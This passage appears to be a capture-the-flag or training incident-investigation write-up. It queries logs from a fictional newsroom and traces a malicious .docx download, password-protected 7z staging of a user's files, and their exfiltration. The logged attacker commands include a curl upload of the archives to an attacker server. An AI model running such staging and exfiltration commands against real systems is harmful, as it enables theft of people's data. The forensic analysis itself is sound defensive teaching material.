    tostring(parse_url(url).Path)
    ).Filename)
    endswith ".docx"
Query Results
ip_addr timestamp method user_agent url
10.10.0.19 2024-01-10 08:55:07.0000 GET Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
10.10.0.19 2024-01-31 09:47:51.0000 GET Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 https://hire-recruit.org/files/fakescandal/2024/fakestory.docx

First, Ronnie McLovin downloaded the malicious attachment on Jan. 10th 2024; 21 days later the attackers downloaded the fake story off their own server using their hands-on-keyboard access to Ronnie's computer. As noted previously (see [17]), this file would later be renamed and sent to Clark Kent 45 minutes later (see timestamp at [3]).

Ronnie informs me that she just received an email (2024-02-04) from her preferred dark web monitoring service, informing her of her personal information being leaked and put on sale at hirerecruit.com. Slightly modifying our previous query to account for the new date, we find four new events:

Query Results
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-01-31 11:44:58.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDocuments.7z C:\Users\romclovin\Documents\*.docx -p thruthW!llS3tUfree cmd.exe 9213e057cdc0690c892923da64501102349dbd334e8c33d9f15ebc50b0743f46 A37A-DESKTOP romclovin
2024-01-31 11:48:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDesktop.7z C:\Users\romclovin\Desktop\*.docx -p thruthW!llS3tUfree cmd.exe 097ecb4a7aa3b8ef4af608b6439ff9c8202c76e1c260d4e3f7ed77ab40064354 A37A-DESKTOP romclovin
2024-01-31 11:49:47.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\Users\romclovin\Documents\DankMemes.7z C:\Users\romclovin\Memes\*.jpg -p thruthW!llS3tUfree cmd.exe 772b8658b4cc968a57b1cb3160bdac5bc9119faa166cfb954d5f7ce3f961c895 A37A-DESKTOP romclovin
2024-02-01 02:14:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php cmd.exe 8b49eaf11c8332d422db83717360da2bad21fc78d6dd1dd9e1f5a6188fb391a9 A37A-DESKTOP romclovin

The attackers indiscriminately add Ronnie's files to various password-protected 7zip archives on Jan. 31st, and on Feb. 1st exfiltrate the data to a server under their control. The domain is hirejob.com. The archives were named MyStolenDataFromDocuments.7z, MyStolenDataFromDesktop.7z and DankMemes.7z. To cap off the investigation, we'll do a quick check if anyone else had data exfiltrated within Valdorian Times.

ProcessEvents
| where process_commandline startswith "curl"
Query Results
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-02-01 02:14:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php cmd.exe 8b49eaf11c8332d422db83717360da2bad21fc78d6dd1dd9e1f5a6188fb391a9 A37A-DESKTOP romclovin

The only individual who had their data exfiltrated was Ronnie McLovin.